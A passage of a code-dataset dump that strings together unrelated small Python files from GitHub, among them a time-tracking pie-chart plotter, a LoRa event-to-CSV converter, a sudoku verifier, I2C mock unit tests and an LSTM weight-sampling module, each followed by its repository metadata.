plt\n import matplotlib.cm as cm\n\n my_color = read_json(\"./color_config.json\")\n\n label = []\n data = []\n col = [None for i in range(len(all_data))]\n\n for i, elem in enumerate(sorted(all_data.items(), key=lambda x: -x[1])):\n key = elem[0]\n val = elem[1]\n h = int(all_data[key].total_seconds()//(60*60))\n m = int(all_data[key].total_seconds()/60 - h*60)\n str_t = \"{0}h{1}m\".format(h, m)\n label.append(\"{0} [{1}]\".format(key, str_t))\n data.append(val.total_seconds()/60)\n if key in my_color:\n col[i] = hex2color(my_color[key])\n\n no_color_lange = col.count(None)\n cmap = cm.gist_rainbow(np.arange(no_color_lange)/float(no_color_lange))\n\n cnt = 0\n for i, elem in enumerate(col):\n if elem is None:\n col[i] = cmap[cnt]\n cnt += 1\n\n plt.rcParams['font.family'] = 'Yu Mincho'\n # plt.rcParams['font.family'] = 'Hiragino Maru Gothic Pro'\n plt.figure(figsize=(18, 10))\n plt.pie(data,counterclock=False,startangle=90,autopct=lambda p:'{:.1f}%'.format(p), colors=col)\n plt.subplots_adjust(left=0,right=0.7)\n plt.legend(label, fancybox=True, loc='upper left', bbox_to_anchor=(0.83, 1))\n plt.axis('equal')\n plt.show()\n\ndef new_format_aggregate(all_data):\n ret_data = {}\n for day in all_data:\n data_elem = all_data[day]\n for subj in data_elem:\n for subj_key in data_elem[subj]:\n t = new_format_calc_time(data_elem[subj][subj_key])\n ret_data[subj] = ret_data[subj] + t if subj in ret_data else t\n return ret_data\n\ndef main():\n parser = parse_arguments()\n args = parser.parse_args()\n data = read_json(args.path)\n\n if args.plot:\n data = aggregate(data)\n plot(data)\n\n elif args.new_plot:\n data = new_format_aggregate(data)\n plot(data)\n\n elif args.day is not None:\n use_data = data[args.day]\n data = summarize(use_data)\n output(data)\n\n else:\n parser.print_help()\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"R-Imai/dailyProgress-calculation","sub_path":"calc_timer.py","file_name":"calc_timer.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11340690895","text":"# -*- coding: utf-8 -*-\n\n#------------------------------------------------------------------------------------------------------------------------------\n# SYS.ARGV[0] -> eventsReader.py\n# SYS.ARGV[1] -> pasta raiz do teste\n\n# A pasta raiz do teste deve conter as pastas LOG, JSON e CSV, e dentro de JSON deve haver dois arquivos, frames.json e events.json\n\n# EXEMPLO: dimi@dimi-lss01:~$ python3 eventsReader.py ../../Aquisicoes/Pycom/Teste1\n#------------------------------------------------------------------------------------------------------------------------------\n\nimport json\nimport sys\nimport os\nfrom datetime import datetime\nimport base64\n\nif len(sys.argv) != 2:\n\tprint(\"Erro na entrada de parâmetros. 1 -> caminho para a pasta raiz da aquisicao. \")\nelse:\n\t# LENDO OS PARÂMETROS\n\tarquivoJSON = sys.argv[1] + \"/JSON/events.json\"\n\n\t# VERIFICANDO SE O ARQUIVO JSON EXISTE MESMO\n\tarquivoExiste = os.path.isfile(arquivoJSON)\n\t\n\tif arquivoExiste == False or arquivoExiste == 0:\n\t\tprint(\"O arquivo JSON que você está tentando abrir não existe. Verifique o nome e o caminho.\")\n\telse:\n\t\t# ABRINDO O ARQUIVO JSON E LENDO\n\t\twith open(arquivoJSON, 'r') as jsonFile:\n\t\t\tdata = json.load(jsonFile)\n\n\t\t# CRIANDO UM ARQUIVO CSV PRA GRAVAR AS INFORMAÇÕES NELE TB\n\t\tnomeCSV = sys.argv[1] + \"/CSV/ENDNODE_\" + datetime.now().strftime('%Y%m%d%H%M%S') + \".csv\"\n\t\tcsvFile = open(nomeCSV, \"a+\")\n\n\t\tcsvFile.write(\"fCnt,\")\n\t\tcsvFile.write(\"data,\")\n\t\tcsvFile.write(\"adr,\")\n\t\tcsvFile.write(\"dr,\")\n\t\tcsvFile.write(\"frequency\\n\")\n\t\t\n\t\t# VOU PASSAR POR CADA ELEMENTO DO LORA E SALVAR APENAS O QUE EU QUERO\n\t\tfor x in data:\n\t\t\ttry:\n\t\t\t\t# IGNORANDO OS ACKS\n\t\t\t\tif x[\"result\"][\"type\"] == \"uplink\":\n\t\t\t\t\t# TODAS AS INFORMAÇÕES QUE EU QUERO ESTÃO DENTRO DE UMA STRING QUE É UM JSON\n\t\t\t\t\tstringPayLoad = str(x[\"result\"][\"payloadJSON\"])\n\t\t\t\t\tjsonPayLoad = json.loads(stringPayLoad)\n\n\t\t\t\t\t# PEGANDO AS INFORMAÇÕES\n\t\t\t\t\tfCnt = str(jsonPayLoad[\"fCnt\"])\n\t\t\t\t\tadr = str(jsonPayLoad[\"adr\"])\t\t\t\t\t\n\t\t\t\t\tdr = str(jsonPayLoad[\"txInfo\"][\"dr\"])\n\t\t\t\t\tfrequency = str(jsonPayLoad[\"txInfo\"][\"frequency\"])\t\t\t\t\t\n\n\t\t\t\t\t# PEGANDO A MENSAGEM QUE ESTA EM BASE64\n\t\t\t\t\tdataBase64 = str(jsonPayLoad[\"data\"])\n\t\t\t\t\tdata = str(base64.b64decode(dataBase64))\n\n\t\t\t\t\t# REMOVENDO AQUELE b'' DA MENSAGEM\n\t\t\t\t\tdata = data[2:-1]\n\n\t\t\t\t\t# PRINTANDO NO TERMINAL E ESCREVENDO NO CSV\t\t\t\t\t\t\n\t\t\t\t\tstringFinal = fCnt + \",\"\n\t\t\t\t\tstringFinal = stringFinal + data + \",\"\n\t\t\t\t\tstringFinal = stringFinal + adr + \",\"\t\t\t\t\n\t\t\t\t\tstringFinal = stringFinal + dr + \",\"\n\t\t\t\t\tstringFinal = stringFinal + frequency + \"\\n\"\n\n\t\t\t\t\t# ESCREVENDO NO CSV\n\t\t\t\t\tcsvFile.write(stringFinal)\n\t\t\texcept:\n\t\t\t\tprint(\"eventsReader.py -> Algum dado não pôde ser lido.\")\n\n\t\tcsvFile.close()","repo_name":"DimitriLeandro/SBrT2019","sub_path":"Scripts/Python/eventsReader.py","file_name":"eventsReader.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12791937920","text":"import math\n\nn=[]\n\nm=int(input(\"Število elementov: \"))\n\nfor i in range(0,m):\n ele=(int(input(\"Število: \")))\n\n n.append(ele)\n\n\ndef vrni(list):\n\n avg = sum(list)/len(list)\n \n najblizja = 0\n for i in list:\n razlika = abs(avg-i)\n if razlika < abs(avg-najblizja):\n najblizja = i\n \n\n\n print(max(list), min(list), avg, najblizja)\n\n\n\nvrni(n)","repo_name":"matevzkalcic/TP","sub_path":"DN4/naloga2.py","file_name":"naloga2.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40413398607","text":"\"\"\" This script converts effective pom.xml to dependency report in JSON format \"\"\"\nimport argparse\nimport os\nimport sys\n\nfrom mt.ef import create_dependency_report_json, EXIT_CODE_ERROR\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Create dependency report from effective pom.xml')\n parser.add_argument('--effective_pom_file', help='Path to effective pom.xml', required=True)\n parser.add_argument('--report_file', help='Path to target dependency report', required=True)\n\n args = parser.parse_args()\n\n if not os.path.exists(args.effective_pom_file):\n print(f\"{args.effective_pom_file} not found\")\n sys.exit(EXIT_CODE_ERROR)\n\n with open(args.report_file, \"w\") as report_file:\n report_file.write(create_dependency_report_json(args.effective_pom_file))\n","repo_name":"afrunt/maven-toys","sub_path":"effective_pom_to_dependency_report.py","file_name":"effective_pom_to_dependency_report.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74895887450","text":"class Solution:\n def isValidSerialization(self, preorder: str) -> bool:\n def hasSingleHash(stack):\n return len(stack) == 1 and stack[0] == \"#\"\n\n if preorder == \"#\":\n return True\n preorderStack = preorder.split(',')\n stack = []\n\n for v in preorderStack:\n if hasSingleHash(stack):\n return False\n stack.append(v)\n\n while len(stack) >= 2 and stack[-1] == \"#\" and stack[-2] == \"#\":\n if len(stack) == 2:\n return False\n stack = stack[:-3]\n stack.append(\"#\")\n return hasSingleHash(stack)\n","repo_name":"debbs061/algorithm","sub_path":"src/331-verify-preorder-serialization-of-a-binary-tree.py","file_name":"331-verify-preorder-serialization-of-a-binary-tree.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41304358799","text":"import torch\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom secondmodel import PosePredictionTransformer\nfrom secondpreprocessing import KinectDataset\n\n# Function to make predictions with the model\ndef make_predictions(model, dataloader, device):\n predictions = []\n model.eval() # Set the model to evaluation mode\n with torch.no_grad():\n for i, (input_seq, _) in enumerate(dataloader):\n input_seq = input_seq.to(device)\n output = model(input_seq) # Get model predictions\n predictions.append(output.cpu().numpy()) # Store predictions\n return predictions\n\n# Combine predictions with overlapping averaging\ndef average_overlapping_predictions(predictions, overlap_size):\n averaged_predictions = []\n for i in range(len(predictions)):\n for j in range(5): # Assuming each prediction has 5 frames\n if i == 0 and j < overlap_size:\n # Initialize the first set of predictions\n averaged_predictions.append(predictions[i][j])\n elif j < overlap_size:\n # Average the overlapping predictions\n index = i + j\n averaged_predictions[index] = (averaged_predictions[index] + predictions[i][j]) / 2\n else:\n # Add the non-overlapping predictions\n averaged_predictions.append(predictions[i][j])\n for i in range(len(averaged_predictions)):\n #multiply each element by 1000 just to make it easier to see on OpenGL\n averaged_predictions[i] = averaged_predictions[i] * 1000\n return averaged_predictions\n\n# Placeholder paths\nmodel_path = 'lowest_avg.pth'\ndata_path = '../data/midterm-processed/curve-right_processed.txt'\noutput_path = '../../../visualization/joint_visualizations/right-predict.txt'\n\n# Model parameters (adjust as necessary)\nnum_layers = 3\nd_model = 32\nnum_heads = 8\n\n# Load the trained model\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel = PosePredictionTransformer(num_layers, d_model, num_heads)\nmodel.load_state_dict(torch.load(model_path, map_location=device))\nmodel.to(device)\n\n# Load the data using KinectDataset\ndataset = KinectDataset(data_path)\ndataloader = DataLoader(dataset, batch_size=1, shuffle=False)\n\n# Make predictions\npredictions = make_predictions(model, dataloader, device)\npredictions = np.array(predictions)\npredictions = predictions.reshape(predictions.shape[0], 5, 3)\n\n# Average the overlapping predictions\noverlap_size = 4 # Number of frames that overlap between predictions\naveraged_predictions = average_overlapping_predictions(predictions, overlap_size)\n\n# Save predictions to file\nwith open(output_path, 'w') as f:\n for pred in averaged_predictions:\n f.write(\"[\")\n # Assuming each prediction is a numpy array with a shape of (num_features,)\n pred_string = ','.join(map(str, pred))\n f.write(pred_string + ']' + '\\n')\nprint(f\"Predictions saved to {output_path}\")\n","repo_name":"Navya025/pose_prediction_hallway_passing","sub_path":"transformer/custom/hip_only/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35572800186","text":"\nfrom django.urls import path\n\nfrom shop.views import index, search, create_announce, edit_announcement, announce_details, delete_announce\n\nurlpatterns = [\n path('', index, name='index page'),\n path('results/', search, name='result page'),\n path('create_announce/', create_announce, name='create announcement'),\n path('edit_announce/', edit_announcement, name='edit announce'),\n path('details_announce/', announce_details, name='details announce'),\n path('delete_announce/', delete_announce, name='delete announce'),\n ]\n","repo_name":"StoyanDimStoyanov/django_exam","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1081803105","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def leafSimilar(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> bool:\n\n if self.leaves(root1)==self.leaves(root2):\n return True\n return False\n \n def leaves(self,root):\n res=[]\n def helper(root):\n if not root:\n return \n if not root.left and not root.right:\n res.append(root.val)\n helper(root.left)\n helper(root.right)\n \n helper(root)\n return res\n \n ","repo_name":"pratham76/Leetcode","sub_path":"0904-leaf-similar-trees/0904-leaf-similar-trees.py","file_name":"0904-leaf-similar-trees.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70325746971","text":"import mraa as m\nimport unittest as u\n\nfrom i2c_checks_shared import *\n\nclass I2cChecksWriteWordData(u.TestCase):\n def setUp(self):\n self.i2c = m.I2c(MRAA_I2C_BUS_NUM)\n\n def tearDown(self):\n del self.i2c\n\n def test_i2c_write_word_data(self):\n self.i2c.address(MRAA_MOCK_I2C_ADDR)\n high_byte = 0xAA\n low_byte = 0xBB\n test_word = (high_byte << 8) + low_byte\n reg = MRAA_MOCK_I2C_DATA_LEN - 2\n self.assertEqual(self.i2c.writeWordReg(reg, test_word),\n m.SUCCESS,\n \"I2C writeWordReg() did not return success\")\n self.assertEqual(self.i2c.readReg(reg),\n high_byte,\n \"I2C readReg() of higher byte after writeWordReg() returned unexpected data\")\n self.assertEqual(self.i2c.readReg(reg + 1),\n low_byte,\n \"I2C readReg() of lower byte after writeWordReg() returned unexpected data\")\n\n def test_i2c_write_word_data_invalid_addr(self):\n self.i2c.address(MRAA_MOCK_I2C_ADDR - 1)\n test_word = 0xAABB\n reg = MRAA_MOCK_I2C_DATA_LEN - 2\n self.assertEqual(self.i2c.writeWordReg(reg, test_word),\n m.ERROR_UNSPECIFIED,\n \"I2C writeWordReg() to invalid address did not return error\")\n\n def test_i2c_write_word_data_invalid_reg(self):\n self.i2c.address(MRAA_MOCK_I2C_ADDR)\n test_word = 0xAABB\n reg = MRAA_MOCK_I2C_DATA_LEN\n self.assertEqual(self.i2c.writeWordReg(reg, test_word),\n m.ERROR_UNSPECIFIED,\n \"I2C writeWordReg() with invalid register did not return error\")\n\nif __name__ == \"__main__\":\n u.main()\n","repo_name":"eclipse/mraa","sub_path":"tests/mock/i2c_checks_write_word_data.py","file_name":"i2c_checks_write_word_data.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1333,"dataset":"github-code","pt":"32"} +{"seq_id":"72078300251","text":"\"\"\"\n Program to increment the numeric value in a string and return the processed string\n\n Input: st = 'xrt123ish-9tq'\n Output: 'xrt124ish-8tq'\n\"\"\"\n\nimport sys\n\n\ndef increment_integer_in_string(st):\n tmp, res = [], []\n for k, i in enumerate(st):\n if i == '-' and st[k+1].isdigit() or i.isdigit():\n tmp.append(i)\n else:\n if tmp:\n tmp = \"\".join(tmp)\n res.append(str(int(tmp)+1))\n res.append(i)\n tmp = []\n return \"\".join(res)\n\n\nif __name__ == \"__main__\":\n if sys.version_info.major == 2 and sys.version_info.minor < 8:\n input = raw_input\n else:\n input = input\n st = input(\"Enter the string: \")\n print(increment_integer_in_string(st))","repo_name":"harishtm/learningpython","sub_path":"coding_programs/increment_integer_in_string.py","file_name":"increment_integer_in_string.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4663360566","text":"from path import Path\nfrom io_utils.preprocess import SIMPLE_FILTERS, preprocess_review\nimport cPickle as pkl\n\nimport platform\nif platform.system() == 'Windows':\n cr_pickle = Path('C:/Users/Song/Course/571/project/pickled_data/cr.pkl')\n pos = Path('D:/data/nlpdata/cr/custrev.pos')\n neg = Path('D:/data/nlpdata/cr/custrev.neg')\nelse:\n cr_pickle = Path('/home/scz8928999/data/pickled/cr.pkl')\n pos = Path('/home/scz8928999/data/cr/custrev.pos')\n neg = Path('/home/scz8928999/data/cr/custrev.neg')\n\n\ndef read_data(p):\n label = 1 if p[-3:] == 'pos' else 0\n f = open(p)\n x = []\n for line in f:\n line = unicode(line, errors='ignore')\n x.append(preprocess_review(line, filters=SIMPLE_FILTERS))\n y = [label] * len(x)\n return x, y\n\n\ndef save_cr_pickle():\n pos_x, pos_y = read_data(pos)\n neg_x, neg_y = read_data(neg)\n x = pos_x + neg_x\n y = pos_y + neg_y\n f = open('cr.pkl', 'wb')\n pkl.dump((x, y), f, -1)\n f.close()\n\n\ndef read_cr_pickle():\n f = open(cr_pickle, 'rb')\n x, y = pkl.load(f)\n return x, y","repo_name":"csong27/NgramNeuralNetworks","sub_path":"io_utils/load_data/load_cr.py","file_name":"load_cr.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25673035204","text":"#!/usr/bin/python3\n\"\"\"\nCalculate island perimeter\n\"\"\"\n\ndef island_perimeter(grid):\n perimeter = 0\n for r in range(len(grid)):\n for c in range(len(grid[r])):\n if grid[r][c] == 1:\n sur = get_surround(r, c, grid)\n perimeter += sum([1 for w in sur if w == 0])\n return perimeter\n\n\ndef get_surround(i, j, grid):\n return (grid[i][j + 1], grid[j][j - 1], grid[i - 1][j], grid[i + 1][j])\n","repo_name":"anasyaser/alx-low_level_programming","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3474983128","text":"'''\nVerify an 2D numpy array that fulfill the conditions for SUDOKU\n'''\n\nimport numpy as np\nimport logging\n\npath = r'C:\\Users\\Horace.000\\eclipse-workspace\\Python_Project_6_Online_Courses\\00_ALL\\numpy\\Apps\\verify_sudoku.log'\n\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.DEBUG,\n filename=path, \n filemode='w')\n\nlogger = logging.getLogger('main')\n\n\ndef split_the_grid_in_small_squares(grid_arr):\n '''\n Split the grid in small squares and make a list with them\n '''\n ss_list = list()\n \n #ss0 = grid_arr[0:3, 0:3]\n #logging.debug(f'\\n{ss0}')\n #ss1 = grid_arr[0:3, 3:6]\n #logging.debug(f'\\n{ss1}')\n #ss2 = grid_arr[0:3, 6:9]\n #logging.debug(f'\\n{ss2}')\n #ss3 = grid_arr[3:6, 0:3]\n #logging.debug(f'\\n{ss3}')\n \n for m in range(0,9,3):\n for n in range(0,9,3):\n ss = grid_arr[m:m+3, n:n+3]\n print(ss)\n #logging.debug(f'\\n{ss}')\n ss_list.append(ss)\n \n return ss_list\n\n\ndef verify_solution(grid_arr):\n \n NINE = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9])\n \n logging.info(f'The grid for verification is: \\n{grid_arr}')\n \n # verify the rows\n for r in range(9):\n logging.info(f'Verifying row nr. {r}: {grid_arr[r, :]}')\n if (np.sort(grid_arr[r, :]) == NINE).all():\n logging.debug(f'Row nr. {r} PASSED the verification!')\n else:\n logging.debug(f'Row nr. {r} FAILED the verification!')\n return False\n \n # verify the columns\n for c in range(9):\n logging.info(f'Verifying column nr. {c}: {grid_arr[:, c]}')\n if (np.sort(grid_arr[:, c]) == NINE).all():\n logging.debug(f'Column nr. {c} PASSED the verification!')\n else:\n logging.debug(f'Column nr. {c} FAILED the verification!')\n return False\n \n # verify the small squares\n ss_list = split_the_grid_in_small_squares(grid_arr)\n \n for nr_ss in range(9):\n logging.info(f'Verifying small square nr. {nr_ss}: \\n{ss_list[nr_ss]}')\n ss = ss_list[nr_ss]\n ss_flat = ss.flatten()\n if (np.sort(ss_flat) == NINE).all():\n logging.debug(f'Small square nr. {nr_ss} PASSED the verification!')\n else:\n logging.debug(f'Small square nr. {nr_ss} FAILED the verification!')\n return False\n \n return True\n\nmy_list = [[3, 7, 1, 6, 8, 4, 9, 5, 2],\n [8, 4, 9, 7, 2, 5, 3, 6, 1],\n [5, 6, 2, 9, 3, 1, 4, 7, 8],\n [6, 8, 7, 2, 1, 9, 5, 3, 4],\n [9, 1, 4, 3, 5, 7, 2, 8, 6],\n [2, 5, 3, 8, 4, 6, 1, 9, 7],\n [1, 3, 6, 5, 7, 2, 8, 4, 9],\n [4, 9, 8, 1, 6, 3, 7, 2, 5],\n [7, 2, 5, 4, 9, 8, 6, 1, 3]]\n\n\ngrid_arr = np.array(my_list)\n\nresult = verify_solution(grid_arr)\n\nif result:\n logging.debug(f'The result of the verification: TRUE, the grid is SUDOKU!')\n print(f'The result of the verification: TRUE, the grid is SUDOKU!')\nelse:\n logging.debug(f'The result of the verification: FALSE, the grid is NOT SUDOKU!')\n print(f'The result of the verification: FALSE, the grid is NOT SUDOKU!')\n","repo_name":"H0r4c3/Python_00_ALL","sub_path":"numpy/Apps/verify_sudoku.py","file_name":"verify_sudoku.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21175513999","text":"# A simple example to show inheritance in Python\n\nfrom typing import Dict\n\nglobalPublicationMap:Dict[int,str] = {\n 1: \"Apress\",\n 2: \"Orily\"\n}\n\nclass Publication:\n def __init__(self, pubID:int, title:str ) -> None:\n self.publisherID = pubID\n self.title = title\n\n def __str__(self) -> str:\n stringRep:str = self.title\n stringRep += \" by \"\n stringRep += globalPublicationMap[self.publisherID]\n\n # This is what would be dispayed in the cosole\n return stringRep\n\n# Passing the base class name in () in the class declaration\n# followed by calling super() method\nclass HardCopy(Publication):\n def __init__(self, pubID: int, title: str, store:str) -> None:\n super().__init__(pubID, title)\n self.physicalStore = store\n\nclass SoftCopy(Publication):\n def __init__(self, pubID: int, title: str, url:str) -> None:\n super().__init__(pubID, title)\n self.downloadLink = \"AWS://\" + url\n\ncppBook = HardCopy(1,\"Introduction to C++\",\"BLR\")\nprint(cppBook)\n\nopenGLBook = SoftCopy(2, \"OpenGL Stuff\", \"amazon.com/abcd\")\nprint(openGLBook)\n","repo_name":"debojyoti-majumder/HobbyProjects","sub_path":"pyBasicApp1/langfeatures/inherit.py","file_name":"inherit.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20688559435","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass LSTM_NodeLinWeightsDistribution(nn.Module):\r\n \"\"\"\r\n Linear structural equation autoregressive weights distribution for a node given its parents using an LSTM\r\n \"\"\"\r\n def __init__(self, n_weights, hidden_dim=48, n_layers=3):\r\n \"\"\"\r\n Initialise distribution\r\n :param n_weights: number of weights to be modelled by the distribution. It needs to be equivalent to the number\r\n of nodes in the graph.\r\n :param hidden_dim: LSTM input, hidden and cell states dimension\r\n :param n_layers: number of layers in the LSTM\r\n \"\"\"\r\n super().__init__()\r\n self.n_weights = n_weights\r\n self.hidden_dim = hidden_dim\r\n self.n_layers = n_layers\r\n\r\n self.rnn = nn.LSTM(self.hidden_dim, self.hidden_dim, num_layers=n_layers, batch_first=True)\r\n # Project the output of the LSTM into a mean\r\n self.proj_mean = nn.Linear(self.hidden_dim, 1)\r\n # Embed the input of the LSTM into a vector\r\n self.embed_input = nn.Linear(1, self.hidden_dim)\r\n # Embed an adjacency entry into a vector\r\n self.embed_adj = nn.Linear(self.n_weights, self.hidden_dim)\r\n # Initialise the initial hidden state. It will be updated when using back-propagation\r\n self.h0 = nn.Parameter(1e-3 * torch.randn(1, self.n_layers, self.hidden_dim))\r\n # Initialise the initial cell state. It will be updated when using back-propagation\r\n self.c0 = nn.Parameter(1e-3 * torch.randn(1, self.n_layers, self.hidden_dim))\r\n # Initialise variable for the initial input of the LSTM. It will be updated when using back-propagation\r\n self._init_input_param = nn.Parameter(torch.zeros(1, 1, 1))\r\n\r\n def forward(self, adj, reparametrized=True, return_norm_params=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent\r\n :param adj: batch of adjacency entries\r\n :param reparametrized: if False, every element of the weight vectors is sampled using a Normal distribution.\r\n Sampling from the Normal distribution is not differentiable, though. If\r\n True, every element of the weight vectors is sampled using the Normal distribution\r\n reparameterization trick. Thus, this operation is differentiable.\r\n :param return_norm_params: if True, the Normal distribution parameters are returned as well\r\n :param start_state: initial state of the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vector samples or weight vectors samples, Normal distribution parameters\r\n \"\"\"\r\n samples, means, stds = self._sample(adj, reparametrized=reparametrized, start_state=start_state,\r\n init_input=init_input)\r\n if return_norm_params:\r\n return samples, means, stds\r\n else:\r\n return samples\r\n\r\n def _compute_norm_params(self, adj, inputs, state):\r\n \"\"\"\r\n Compute batch of means, stds and states by feeding a batch of adjacency entries, inputs and initial states to\r\n the LSTM\r\n :param adj: batch of adjacency entries\r\n :param inputs: batch of inputs to the LSTM\r\n :param state: batch of initial states of the LSTM\r\n :return: batch of means, stds, output states\r\n \"\"\"\r\n # adj size = (B,T) where B=batch size, T=self.n_weights\r\n # input size = (B,L,1) where B=batch size, L=sequence length,\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n inputs = self.embed_input(inputs)\r\n # inputs size = (B,L,H) where B=batch size, L=sequence length, H=self.hidden_dim\r\n adj = self.embed_adj(adj)\r\n # adj size = (B,H) where B=batch size, H=self.hidden_dim\r\n adj = adj.unsqueeze(1)\r\n # adj size = (B,1,H) where B=batch size, H=self.hidden_dim\r\n inputs = inputs * adj\r\n # inputs size = (B,L,H)\r\n out, state = self.rnn(inputs, self._t(state))\r\n # out size = (B,L,H) where B=batch size, L=sequence length, H=self.hidden_dim\r\n # state = tuple where both elements have size (Q,B,H) where Q=self.n_layers, B=batch size, H=self.hidden_dim\r\n state = self._t(state)\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n means = self.proj_mean(out)\r\n # means size = (B,L,1) where B=batch size, L=sequence length\r\n stds = torch.ones_like(means)\r\n # stds size = (B,L,1) where B=batch size, L=sequence length\r\n return means, stds, state\r\n\r\n def sample(self, adj, return_norm_params=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent, using the Normal distribution.\r\n :param adj: batch of adjacency entries\r\n :param return_norm_params: if True, the Normal distribution parameters are returned as well\r\n :param start_state: initial state of the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vector samples or weight vectors samples, Normal distribution parameters\r\n \"\"\"\r\n samples, means, stds = self._sample(adj, start_state=start_state, init_input=init_input)\r\n if return_norm_params:\r\n return samples, means, stds\r\n else:\r\n return samples\r\n\r\n def rsample(self, adj, return_norm_params=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent, using the Normal distribution reparameterization trick.\r\n :param adj: batch of adjacency entries\r\n :param return_norm_params: if True, the Normal distribution parameters are returned as well\r\n :param start_state: initial state of the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vector samples or weight vectors samples, Normal distribution parameters\r\n \"\"\"\r\n samples, means, stds = self._sample(adj, reparametrized=True, start_state=start_state,\r\n init_input=init_input)\r\n if return_norm_params:\r\n return samples, means, stds\r\n else:\r\n return samples\r\n\r\n def _sample(self, adj, reparametrized=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent.\r\n :param adj: batch of adjacency entries\r\n :param reparametrized: if False, every element of the weight vectors is sampled using a Normal distribution.\r\n Sampling from the Normal distribution is not differentiable, though. If\r\n True, every element of the weight vectors is sampled using the Normal distribution\r\n reparameterization trick. Thus, this operation is differentiable.\r\n :param start_state: initial state of the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vectors samples, means and stds\r\n \"\"\"\r\n assert adj.shape[1] == self.n_weights\r\n # adj size = (B,T) where B=batch size, T=self.n_weights\r\n if start_state is None:\r\n state = self._get_state(adj.shape[0]) # hidden / cell state at t=0\r\n else:\r\n state = start_state\r\n if init_input is None:\r\n input = self._get_init_input(adj.shape[0]) # input at t=0\r\n else:\r\n input = init_input\r\n\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n # input size = (B,1,1) where B=batch size\r\n\r\n sampled_tokens = []\r\n state_array_1 = []\r\n state_array_2 = []\r\n means_array = []\r\n stds_array = []\r\n\r\n for t in range(self.n_weights):\r\n means, stds, state = self._compute_norm_params(adj, input, state)\r\n # means size = (B,1,1) where B=batch size\r\n # stds size = (B,1,1) where B=batch size\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n if reparametrized:\r\n _sample = torch.distributions.normal.Normal(means, stds).rsample().unsqueeze(2)\r\n # _sample size = (B,1,1) where B=batch size\r\n else:\r\n _sample = torch.distributions.normal.Normal(means, stds).sample().unsqueeze(2)\r\n # _sample size = (B,1,1) where B=batch size\r\n adj_col = adj[:, t].unsqueeze(2)\r\n # adj_col size = (B,1,1) where B=batch size\r\n _sample = _sample * adj_col\r\n # _sample size = (B,1,1) where B=batch size\r\n means = means * adj_col\r\n # means size = (B,1,1) where B=batch size\r\n stds = stds * adj_col\r\n # stds size = (B,1,1) where B=batch size\r\n input = _sample\r\n sampled_tokens.append(_sample)\r\n state_array_1.append(state[0])\r\n state_array_2.append(state[1])\r\n 